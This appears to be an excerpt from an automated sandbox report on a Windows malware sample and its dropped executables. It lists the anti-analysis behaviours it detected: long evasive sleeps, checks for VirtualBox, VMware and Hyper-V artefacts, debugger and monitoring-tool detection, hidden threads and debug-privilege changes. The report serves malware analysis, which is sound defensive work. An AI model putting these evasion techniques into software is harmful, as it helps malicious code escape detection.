Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	API coverage: 3.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104	Thread sleep count: 1101 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104	Thread sleep time: -2203101s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8108	Thread sleep count: 1066 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8108	Thread sleep time: -2133066s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8092	Thread sleep count: 1130 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8092	Thread sleep time: -2261130s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8096	Thread sleep count: 1113 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8096	Thread sleep time: -2227113s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep count: 216 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep time: -6480000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080	Thread sleep count: 1111 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080	Thread sleep time: -2223111s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8084	Thread sleep count: 1049 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8084	Thread sleep time: -2099049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100	Thread sleep count: 1133 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100	Thread sleep time: -2267133s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE TID: 8016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep count: 4087 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 590 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2536	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep count: 4019 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2792	Thread sleep count: 167 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3796	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 412	Thread sleep count: 3276 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6112	Thread sleep count: 466 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2176	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2124	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020	Thread sleep count: 3795 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320	Thread sleep count: 520 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7120	Thread sleep count: 5222 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe TID: 7024	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE TID: 6120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532	Thread sleep count: 4144 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556	Thread sleep time: -1844674407370954s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00F7DBBE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F868EE FindFirstFileW,FindClose,	8_2_00F868EE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_00F8698F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00F7D076
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00F7D3A9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00F89642
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00F8979D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00F89B2B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_00F85C97
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406301 FindFirstFileW,FindClose,	30_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	30_2_00406CC7

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00F142DE

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: skotes.exe, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002E.00000002.2476445885.0000000000709000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: powershell.exe, 00000010.00000002.3251913835.0000024E79E7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(-
Source: powershell.exe, 0000000D.00000002.2318906148.0000000007664000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y"\|
Source: powershell.exe, 00000024.00000002.2470935295.0000000007300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWw
Source: mshta.exe, 0000000F.00000003.2286431742.0000020E49699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\^
Source: powershell.exe, 00000024.00000002.2470935295.0000000007300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 0000000A.00000003.2263100502.0000000003238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s~e
Source: mshta.exe, 00000032.00000003.2423868229.00000000027AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}77#G
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: mshta.exe, 00000022.00000002.2374702831.00000000032F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I0*A
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000000A.00000003.2263100502.0000000003238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\[AM
Source: powershell.exe, 0000000D.00000002.2318906148.0000000007664000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000032.00000003.2423868229.00000000027AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\P7
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: powershell.exe, 00000024.00000002.2497298201.0000000008620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: mshta.exe, 0000000F.00000003.2286431742.0000020E49699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\+
Source: DhqvS8pXj8.exe, 00000000.00000002.1715108275.00000000004B7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1733086772.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1741388551.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002E.00000002.2476445885.0000000000709000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: powershell.exe, 0000000D.00000002.2319375250.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2408210449.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000034.00000002.2550594395.0000000007940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00Y

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: NTICE
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: SICE
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Code function: 0_2_05100BE7 rdtsc

0_2_05100BE7

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F8EAA2 BlockInput,

8_2_00F8EAA2

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00F42622

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00F142DE

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0091652B mov eax, dword ptr fs:[00000030h]	6_2_0091652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0091A302 mov eax, dword ptr fs:[00000030h]	6_2_0091A302
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F34CE8 mov eax, dword ptr fs:[00000030h]	8_2_00F34CE8

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

8_2_00F70B62

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00F42622
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00F3083F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F309D5 SetUnhandledExceptionFilter,	8_2_00F309D5
